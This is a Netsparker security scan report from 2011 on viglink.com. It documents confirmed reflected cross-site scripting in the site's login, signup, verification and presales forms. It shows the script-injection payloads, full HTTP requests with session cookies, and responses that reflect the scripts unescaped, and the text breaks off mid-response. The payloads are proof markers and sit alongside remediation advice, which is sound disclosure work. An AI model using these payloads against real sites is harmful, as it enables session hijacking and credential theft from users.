Netsparker, Web Application Security Scanner

XSS, www.viglink.com REPORT SUMMARY

Loading
Netsparker - Scan Report Summary
TARGET URL
 https://www.viglink.com/users/action/login
SCAN DATE
 4/18/2011 6:51:32 PM
REPORT DATE
 4/18/2011 7:12:01 PM
SCAN DURATION
 00:04:46

Total Requests

Average Speed

req/sec.
19
identified
10
confirmed
0
critical
2
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
 Previous Settings
ENABLED ENGINES
 Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
37 %
MEDIUM
32 %
LOW
21 %
INFORMATION
11 %
Cross-site Scripting

Cross-site Scripting

6 TOTAL
IMPORTANT
CONFIRMED
5
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /users/action/send-verification

/users/action/send-verification CONFIRMED

https://www.viglink.com/users/action/send-verification

Parameters

Parameter Type Value
email POST '"--></style></script><script>alert(0x00041F)</script>

Request

POST /users/action/send-verification HTTP/1.1
Referer: https://www.viglink.com/users/send-verification
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.viglink.com
Cookie: JSESSIONID=A406683588D7BD88342AC125C6ACA8B1; vglnk.Agent.p=bfddb90717c6db6b0a7878196952ce96
Content-Length: 91
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00041F)%3c%2fscript%3e

Response

HTTP/1.0 200 OK
Date: Mon, 18 Apr 2011 23:52:10 GMT
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: JSESSIONID=195320B75C60819447CDA4AC0D54C0D6; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 2121
Connection: close


<!doctype html><html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"><head> <title>VigLink - Verify</title> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <meta name="keywords" content="affiliate marketing, monetization, content, optimization"/> <meta name="description" content="Your links can be doing more. Unlock the power of your site&#39;s links and earn extra money from your site automatically, transparently and honestly."/> <meta property="og:title" content="VigLink"/> <meta property="og:type" content="company"/> <meta property="og:url" content="http://www.viglink.com/"/> <meta property="og:image" content="http://www.viglink.com/public/images/logo-icon-small.png"/> <meta property="og:latitude" content="37.7801339"/> <meta property="og:longitude" content="-122.396744"/> <meta property="og:street-address" content="539 Bryant St Suite 400"/> <meta property="og:locality" content="San Francisco"/> <meta property="og:region" content="CA"/> <meta property="og:postal-code" content="94107"/> <meta property="og:country-name" content="USA"/> <meta property="og:email" content="info@viglink.com"/> <meta property="og:phone_number" content="+1 (415) 963-9826"/> <meta property="og:fax_number" content="+1 (415) 520-6695"/> <meta property="og:site_name" content="VigLink"/> <meta property="fb:admins" content="6003321,705684"/> <link rel="icon" type="image/png" href="/public/images/favicon.png"/> <link rel="alternate" type="application/rss+xml" title="VigLink Blog &raquo; Feed" href="http://blog.viglink.com/feed/" /> <script type="text/javascript"> var ENV = { account: { }, cookie: { domain: '.viglink.com', suffix: 'p' ? '.p' : '' } }; </script> <link rel="stylesheet" type="text/css" href="/combined.css.h-1806938078.pack" charset="utf-8"/><script type="text/javascript" src="/combined.js.h898114336.pack" charset="utf-8"></script><!--[if IE 7]><link rel="stylesheet" href="/public/css/ie7.css" type="text/css" /><![endif]--></head><body> <div id="header"> <div class="content"> <h1><a href="/">VigLink</a></h1> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><span class="delimiter"></span> <ul class="navigation"> <li><a href="/users/signup">Sign Up</a></li><li><a href="/users/login">Log In</a></li></ul> </div></div><div id="body"> <div id="flash" class="error"> <p>&#039;&#034;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x00041F)&lt;/script&gt; is not a registered account.</p><div class="left corner"></div> <div class="right corner"></div> </div><div class="column span-8"> <h2>Send Verification Email</h2> <p> Complete this form to receive a verification email and activate your account or reset your password. If you are not receiving email from us, try adding system@viglink.com to your address&nbsp;book. <p> <form action="/users/action/send-verification" class="verify_email" id="verify_email" method="post"> <label for="email">Email</label> <input id="email" name="email" size="30" type="text" value="'"--></style></script><script>netsparker(0x00041F)</script>"/> <input name="commit" type="submit" value="Send Email"/> </form></div></div> <div id="footer"> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><ul class="social navigation"> <li class="twitter"><a href="http://www.twitter.com/viglink"><strong>Follow us</strong> on Twitter</a></li> <li class="facebook"><a href="http://www.facebook.com/viglink"><strong>Become a fan</strong> on Facebook</a></li> </ul> <ul class="minor navigation"> <li><a href="/about">About</a></li> <li><a href="/jobs">Jobs</a></li> <li><a href="/about/press">Press</a></li> <li><a href="/policies/tos">Terms of Service</a></li> <li><a href="/policies/privacy">Privacy Policy</a></li> <li><a href="/policies/ftc">FTC Disclosure</a></li> <li><a href="/support">Contact Us</a></li> </ul> <span> &copy; VigLink 2011</span></div><script type="text/javascript"> var is_ssl = ("https:" == document.location.protocol); var asset_host = is_ssl ? "https://s3.amazonaws.com/getsatisfaction.com/" : "http://s3.amazonaws.com/getsatisfaction.com/"; document.write(unescape("%3Cscript src='" + asset_host + "javascripts/feedback-v2.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> (function() { try { new GSFN.feedback_widget({ display: "overlay", company: "viglink", placement: "right", color: ";", style: "question" }); } catch(err) {} })(); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-8560005-1"); pageTracker._trackPageview(); } catch(err) {} </script> <!-- Served by: www.viglink.com (10.245.213.194) --></body></html>
- /users/action/login

/users/action/login CONFIRMED

https://www.viglink.com/users/action/login

Parameters

Parameter Type Value
authRedirect POST /users/
email POST '"--></style></script><script>alert(0x00043F)</script>
password POST 3

Request

POST /users/action/login HTTP/1.1
Referer: https://www.viglink.com/users/login?_ek=tl&ar=%2Fusers%2F
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.viglink.com
Cookie: JSESSIONID=B6B3B4173879BB67AB8A8378D7CDCFA6; vglnk.Agent.p=bfddb90717c6db6b0a7878196952ce96
Content-Length: 127
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

authRedirect=%2fusers%2f&email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00043F)%3c%2fscript%3e&password=3

Response

HTTP/1.0 200 OK
Date: Mon, 18 Apr 2011 23:52:16 GMT
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 2045
Connection: close


<!doctype html><html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"><head> <title>VigLink - Sign In</title> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <meta name="keywords" content="affiliate marketing, monetization, content, optimization"/> <meta name="description" content="Your links can be doing more. Unlock the power of your site&#39;s links and earn extra money from your site automatically, transparently and honestly."/> <meta property="og:title" content="VigLink"/> <meta property="og:type" content="company"/> <meta property="og:url" content="http://www.viglink.com/"/> <meta property="og:image" content="http://www.viglink.com/public/images/logo-icon-small.png"/> <meta property="og:latitude" content="37.7801339"/> <meta property="og:longitude" content="-122.396744"/> <meta property="og:street-address" content="539 Bryant St Suite 400"/> <meta property="og:locality" content="San Francisco"/> <meta property="og:region" content="CA"/> <meta property="og:postal-code" content="94107"/> <meta property="og:country-name" content="USA"/> <meta property="og:email" content="info@viglink.com"/> <meta property="og:phone_number" content="+1 (415) 963-9826"/> <meta property="og:fax_number" content="+1 (415) 520-6695"/> <meta property="og:site_name" content="VigLink"/> <meta property="fb:admins" content="6003321,705684"/> <link rel="icon" type="image/png" href="/public/images/favicon.png"/> <link rel="alternate" type="application/rss+xml" title="VigLink Blog &raquo; Feed" href="http://blog.viglink.com/feed/" /> <script type="text/javascript"> var ENV = { account: { }, cookie: { domain: '.viglink.com', suffix: 'p' ? '.p' : '' } }; </script> <link rel="stylesheet" type="text/css" href="/combined.css.h-1806938078.pack" charset="utf-8"/><script type="text/javascript" src="/combined.js.h898114336.pack" charset="utf-8"></script><!--[if IE 7]><link rel="stylesheet" href="/public/css/ie7.css" type="text/css" /><![endif]--></head><body> <div id="header"> <div class="content"> <h1><a href="/">VigLink</a></h1> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul></div></div><div id="body"> <div id="flash" class="error"> <p>Incorrect email/password.</p><div class="left corner"></div> <div class="right corner"></div> </div><div class="column span-8"> <h2>Log In</h2> <form action="https://www.viglink.com/users/action/login" method="post"> <input type="hidden" name="authRedirect" value=""/> <label for="email">Email:</label> <input id="email" name="email" size="30" type="text" value="'"--></style></script><script>netsparker(0x00043F)</script>" placeholder="you@example.com"/> <label for="password">Password:</label> <input id="password" name="password" size="30" type="password"/> <button type="submit">Log In</button> <ul class="actions"> <li><a href="/users/send-verification">I forgot my password</a></li> <li>Need an account? <a href="/users/signup">Sign up</a></li> </ul> </form></div></div> <div id="footer"> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><ul class="social navigation"> <li class="twitter"><a href="http://www.twitter.com/viglink"><strong>Follow us</strong> on Twitter</a></li> <li class="facebook"><a href="http://www.facebook.com/viglink"><strong>Become a fan</strong> on Facebook</a></li> </ul> <ul class="minor navigation"> <li><a href="/about">About</a></li> <li><a href="/jobs">Jobs</a></li> <li><a href="/about/press">Press</a></li> <li><a href="/policies/tos">Terms of Service</a></li> <li><a href="/policies/privacy">Privacy Policy</a></li> <li><a href="/policies/ftc">FTC Disclosure</a></li> <li><a href="/support">Contact Us</a></li> </ul> <span> &copy; VigLink 2011</span></div><script type="text/javascript"> var is_ssl = ("https:" == document.location.protocol); var asset_host = is_ssl ? "https://s3.amazonaws.com/getsatisfaction.com/" : "http://s3.amazonaws.com/getsatisfaction.com/"; document.write(unescape("%3Cscript src='" + asset_host + "javascripts/feedback-v2.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> (function() { try { new GSFN.feedback_widget({ display: "overlay", company: "viglink", placement: "right", color: ";", style: "question" }); } catch(err) {} })(); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-8560005-1"); pageTracker._trackPageview(); } catch(err) {} </script> <!-- Served by: www.viglink.com (10.242.201.220) --></body></html>
- /users/action/send-verification

/users/action/send-verification CONFIRMED

https://www.viglink.com/users/action/send-verification

Parameters

Parameter Type Value
email POST '"--></style></script><script>alert(0x000473)</script>
commit POST Send Email

Request

POST /users/action/send-verification HTTP/1.1
Referer: https://www.viglink.com/users/send-verification
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.viglink.com
Cookie: JSESSIONID=25E61EE723B255F4A5709C0107955670; vglnk.Agent.p=bfddb90717c6db6b0a7878196952ce96
Content-Length: 109
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000473)%3c%2fscript%3e&commit=Send+Email

Response

HTTP/1.0 200 OK
Date: Mon, 18 Apr 2011 23:52:26 GMT
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: JSESSIONID=82C8C30DB5F593AAFD06AAB37D2AA412; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 2121
Connection: close


<!doctype html><html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"><head> <title>VigLink - Verify</title> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <meta name="keywords" content="affiliate marketing, monetization, content, optimization"/> <meta name="description" content="Your links can be doing more. Unlock the power of your site&#39;s links and earn extra money from your site automatically, transparently and honestly."/> <meta property="og:title" content="VigLink"/> <meta property="og:type" content="company"/> <meta property="og:url" content="http://www.viglink.com/"/> <meta property="og:image" content="http://www.viglink.com/public/images/logo-icon-small.png"/> <meta property="og:latitude" content="37.7801339"/> <meta property="og:longitude" content="-122.396744"/> <meta property="og:street-address" content="539 Bryant St Suite 400"/> <meta property="og:locality" content="San Francisco"/> <meta property="og:region" content="CA"/> <meta property="og:postal-code" content="94107"/> <meta property="og:country-name" content="USA"/> <meta property="og:email" content="info@viglink.com"/> <meta property="og:phone_number" content="+1 (415) 963-9826"/> <meta property="og:fax_number" content="+1 (415) 520-6695"/> <meta property="og:site_name" content="VigLink"/> <meta property="fb:admins" content="6003321,705684"/> <link rel="icon" type="image/png" href="/public/images/favicon.png"/> <link rel="alternate" type="application/rss+xml" title="VigLink Blog &raquo; Feed" href="http://blog.viglink.com/feed/" /> <script type="text/javascript"> var ENV = { account: { }, cookie: { domain: '.viglink.com', suffix: 'p' ? '.p' : '' } }; </script> <link rel="stylesheet" type="text/css" href="/combined.css.h-1806938078.pack" charset="utf-8"/><script type="text/javascript" src="/combined.js.h898114336.pack" charset="utf-8"></script><!--[if IE 7]><link rel="stylesheet" href="/public/css/ie7.css" type="text/css" /><![endif]--></head><body> <div id="header"> <div class="content"> <h1><a href="/">VigLink</a></h1> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><span class="delimiter"></span> <ul class="navigation"> <li><a href="/users/signup">Sign Up</a></li><li><a href="/users/login">Log In</a></li></ul> </div></div><div id="body"> <div id="flash" class="error"> <p>&#039;&#034;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000473)&lt;/script&gt; is not a registered account.</p><div class="left corner"></div> <div class="right corner"></div> </div><div class="column span-8"> <h2>Send Verification Email</h2> <p> Complete this form to receive a verification email and activate your account or reset your password. If you are not receiving email from us, try adding system@viglink.com to your address&nbsp;book. <p> <form action="/users/action/send-verification" class="verify_email" id="verify_email" method="post"> <label for="email">Email</label> <input id="email" name="email" size="30" type="text" value="'"--></style></script><script>netsparker(0x000473)</script>"/> <input name="commit" type="submit" value="Send Email"/> </form></div></div> <div id="footer"> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><ul class="social navigation"> <li class="twitter"><a href="http://www.twitter.com/viglink"><strong>Follow us</strong> on Twitter</a></li> <li class="facebook"><a href="http://www.facebook.com/viglink"><strong>Become a fan</strong> on Facebook</a></li> </ul> <ul class="minor navigation"> <li><a href="/about">About</a></li> <li><a href="/jobs">Jobs</a></li> <li><a href="/about/press">Press</a></li> <li><a href="/policies/tos">Terms of Service</a></li> <li><a href="/policies/privacy">Privacy Policy</a></li> <li><a href="/policies/ftc">FTC Disclosure</a></li> <li><a href="/support">Contact Us</a></li> </ul> <span> &copy; VigLink 2011</span></div><script type="text/javascript"> var is_ssl = ("https:" == document.location.protocol); var asset_host = is_ssl ? "https://s3.amazonaws.com/getsatisfaction.com/" : "http://s3.amazonaws.com/getsatisfaction.com/"; document.write(unescape("%3Cscript src='" + asset_host + "javascripts/feedback-v2.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> (function() { try { new GSFN.feedback_widget({ display: "overlay", company: "viglink", placement: "right", color: ";", style: "question" }); } catch(err) {} })(); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-8560005-1"); pageTracker._trackPageview(); } catch(err) {} </script> <!-- Served by: www.viglink.com (10.242.201.220) --></body></html>
- /users/action/signup

/users/action/signup CONFIRMED

https://www.viglink.com/users/action/signup

Parameters

Parameter Type Value
email POST '"--></style></script><script>alert(0x0004A8)</script>

Request

POST /users/action/signup HTTP/1.1
Referer: https://www.viglink.com/users/signup
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.viglink.com
Cookie: JSESSIONID=7572B98F9F6CD9141BDF20CE02DD3304; vglnk.Agent.p=2a85645e86606155fb48bdd87df159eb
Content-Length: 91
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004A8)%3c%2fscript%3e

Response

HTTP/1.0 200 OK
Date: Mon, 18 Apr 2011 23:52:32 GMT
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 2311
Connection: close


<!doctype html><html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"><head> <title>VigLink - Sign Up</title> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <meta name="keywords" content="affiliate marketing, monetization, content, optimization"/> <meta name="description" content="Your links can be doing more. Unlock the power of your site&#39;s links and earn extra money from your site automatically, transparently and honestly."/> <meta property="og:title" content="VigLink"/> <meta property="og:type" content="company"/> <meta property="og:url" content="http://www.viglink.com/"/> <meta property="og:image" content="http://www.viglink.com/public/images/logo-icon-small.png"/> <meta property="og:latitude" content="37.7801339"/> <meta property="og:longitude" content="-122.396744"/> <meta property="og:street-address" content="539 Bryant St Suite 400"/> <meta property="og:locality" content="San Francisco"/> <meta property="og:region" content="CA"/> <meta property="og:postal-code" content="94107"/> <meta property="og:country-name" content="USA"/> <meta property="og:email" content="info@viglink.com"/> <meta property="og:phone_number" content="+1 (415) 963-9826"/> <meta property="og:fax_number" content="+1 (415) 520-6695"/> <meta property="og:site_name" content="VigLink"/> <meta property="fb:admins" content="6003321,705684"/> <link rel="icon" type="image/png" href="/public/images/favicon.png"/> <link rel="alternate" type="application/rss+xml" title="VigLink Blog &raquo; Feed" href="http://blog.viglink.com/feed/" /> <script type="text/javascript"> var ENV = { account: { }, cookie: { domain: '.viglink.com', suffix: 'p' ? '.p' : '' } }; </script> <link rel="stylesheet" type="text/css" href="/combined.css.h-1806938078.pack" charset="utf-8"/><link rel="stylesheet" type="text/css" href="/combined.css.h123230883.pack" charset="utf-8"/><script type="text/javascript" src="/combined.js.h898114336.pack" charset="utf-8"></script><!--[if IE 7]><link rel="stylesheet" href="/public/css/ie7.css" type="text/css" /><![endif]--></head><body> <div id="header"> <div class="content"> <h1><a href="/">VigLink</a></h1> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul></div></div><div id="body"> <div id="flash" class="error"> <p>&#039;&#039;&#034;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0004A8)&lt;/script&gt;&#039; is not a valid email address.</p><div class="left corner"></div> <div class="right corner"></div> </div><ul class="navigation"> <li class=" selected"><span class="step">1</span>Sign Up</li><li><span class="step">2</span>Verify Your Account</li><li><span class="step">3</span>Install VigLink on Your Sites</li></ul><h2>Sign Up</h2><form action="/users/action/signup" method="post" id="signup-email-form"> <label for="email">Email:</label> <input id="email" name="email" size="30" type="text" value="'"--></style></script><script>netsparker(0x0004A8)</script>" placeholder="you@example.com"/> <button type="submit">Join Free</button> <ul class="actions"> <li>Already have an account? <a href="/users/login">Log in</a></li> </ul></form><script type="text/javascript"> if( ! $('#flash').length && location.search.match( /[?&]dr=/i ) ) { $(document).ready( function() { flash.news( '<h4>Driving Revenue is now part of VigLink!</h4> Find out more on the\ <a href="http://blog.viglink.com/2010/08/02/viglink-acquires-driving-revenue/">\ VigLink blog</a>. Sign up now to get all of the benefits of\ Driving Revenue with VigLink.' ); $('#flash').addClass('dr'); } ); }</script></div> <div id="footer"> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><ul class="social navigation"> <li class="twitter"><a href="http://www.twitter.com/viglink"><strong>Follow us</strong> on Twitter</a></li> <li class="facebook"><a href="http://www.facebook.com/viglink"><strong>Become a fan</strong> on Facebook</a></li> </ul> <ul class="minor navigation"> <li><a href="/about">About</a></li> <li><a href="/jobs">Jobs</a></li> <li><a href="/about/press">Press</a></li> <li><a href="/policies/tos">Terms of Service</a></li> <li><a href="/policies/privacy">Privacy Policy</a></li> <li><a href="/policies/ftc">FTC Disclosure</a></li> <li><a href="/support">Contact Us</a></li> </ul> <span> &copy; VigLink 2011</span></div><script type="text/javascript"> var is_ssl = ("https:" == document.location.protocol); var asset_host = is_ssl ? "https://s3.amazonaws.com/getsatisfaction.com/" : "http://s3.amazonaws.com/getsatisfaction.com/"; document.write(unescape("%3Cscript src='" + asset_host + "javascripts/feedback-v2.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> (function() { try { new GSFN.feedback_widget({ display: "overlay", company: "viglink", placement: "right", color: ";", style: "question" }); } catch(err) {} })(); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-8560005-1"); pageTracker._trackPageview(); } catch(err) {} </script> <!-- Served by: www.viglink.com (10.245.213.194) --></body></html>
- /users/action/presales

/users/action/presales CONFIRMED

http://www.viglink.com/users/action/presales

Parameters

Parameter Type Value
email POST you@example.com
domain POST '"--></style></script><script>alert(0x000504)</script>

Request

POST /users/action/presales HTTP/1.1
Referer: http://www.viglink.com/corp/publishers
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.viglink.com
Cookie: JSESSIONID=DC92E13870D74AEEFB7C26AEB8FE179F; vglnk.Agent.p=2a85645e86606155fb48bdd87df159eb
Content-Length: 116
Accept-Encoding: gzip, deflate

email=you%40example.com&domain='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000504)%3c%2fscript%3e

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Encoding:
Content-Language: en
Content-Type: text/html;charset=UTF-8
Date: Mon, 18 Apr 2011 23:52:40 GMT
Expires: -1
Pragma: no-cache
Set-Cookie: JSESSIONID=7190EE1415B13377F192FAD71B8735E4; Path=/
Vary: Accept-Encoding
Content-Length: 3698
Connection: keep-alive


<!doctype html><html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"><head> <title>VigLink - Publishers</title> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <meta name="keywords" content="affiliate marketing, monetization, content, optimization"/> <meta name="description" content="Your links can be doing more. Unlock the power of your site&#39;s links and earn extra money from your site automatically, transparently and honestly."/> <meta property="og:title" content="VigLink"/> <meta property="og:type" content="company"/> <meta property="og:url" content="http://www.viglink.com/"/> <meta property="og:image" content="http://www.viglink.com/public/images/logo-icon-small.png"/> <meta property="og:latitude" content="37.7801339"/> <meta property="og:longitude" content="-122.396744"/> <meta property="og:street-address" content="539 Bryant St Suite 400"/> <meta property="og:locality" content="San Francisco"/> <meta property="og:region" content="CA"/> <meta property="og:postal-code" content="94107"/> <meta property="og:country-name" content="USA"/> <meta property="og:email" content="info@viglink.com"/> <meta property="og:phone_number" content="+1 (415) 963-9826"/> <meta property="og:fax_number" content="+1 (415) 520-6695"/> <meta property="og:site_name" content="VigLink"/> <meta property="fb:admins" content="6003321,705684"/> <link rel="icon" type="image/png" href="/public/images/favicon.png"/> <link rel="alternate" type="application/rss+xml" title="VigLink Blog &raquo; Feed" href="http://blog.viglink.com/feed/" /> <script type="text/javascript"> var ENV = { account: { }, cookie: { domain: '.viglink.com', suffix: 'p' ? '.p' : '' } }; </script> <link rel="stylesheet" type="text/css" href="/combined.css.h-1806938078.pack" charset="utf-8"/><link rel="stylesheet" type="text/css" href="/combined.css.h370935560.pack" charset="utf-8"/><script type="text/javascript" src="/combined.js.h898114336.pack" charset="utf-8"></script><script type="text/javascript" src="/combined.js.h1095210803.pack" charset="utf-8"></script><!--[if IE 7]><link rel="stylesheet" href="/public/css/ie7.css" type="text/css" /><![endif]--></head><body> <div id="header"> <div class="content"> <h1><a href="/">VigLink</a></h1> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li class=" selected"><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><span class="delimiter"></span> <ul class="navigation"> <li><a href="/users/signup">Sign Up</a></li><li><a href="/users/login">Log In</a></li></ul> </div></div><div id="body"> <div id="flash" class="error"> <p>Invalid website &#039;&#039;&#034;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000504)&lt;/script&gt;&#039;</p><div class="left corner"></div> <div class="right corner"></div> </div><div id="subheader">
<h2 class="tagline">
Are you leaving money on the table?</h2>

<div class="column span-8">
<p class="intro">
Install VigLink on your site with a few lines of HTML and be instantly
enrolled in thousands of affiliate programs. Even before you make your
first cent, our analytics will help you find your most valuable links.
</p>
</div>

<div class="column span-4">
<a href="/users/signup" class="default button">Try it, it&#39;s free</a>
</div>
</div>

<div>
<div class="column span-7">
<h3>The universal affiliate program</h3>

<p>
There are <strong>more than 12,500 sites</strong> that pay commissions for
your traffic!
</p>

<ul>
<li>They each have a signup form.</li>
<li>They each have different ways to link with codes that go stale quickly.</li>
<li>They each have minimums that you need to reach or you&#39;ll never get paid.</li>
</ul>

<p>
<strong>One quick and easy install from VigLink and all those problems are
solved!</strong> Automatically participate in every program. Stay up to
date when merchants change their link codes. Enjoy one global minimum
across every program. You'll never have to register for an affiliate
program again!
</p>
</div>

<div id="logos" class="column span-5">
<ul class="logos">
</ul>
<a href="/partners">More Partners</a>
</div>
</div>

<div>
<div class="column span-5" id="analytics">
<img src="/public/images/features/analytics.png" width="345" height="219" alt="Charts and graphs" id="analytics"/>
</div>

<div class="column span-7">
<h3>Powerful analytics for new insight</h3>

<p>
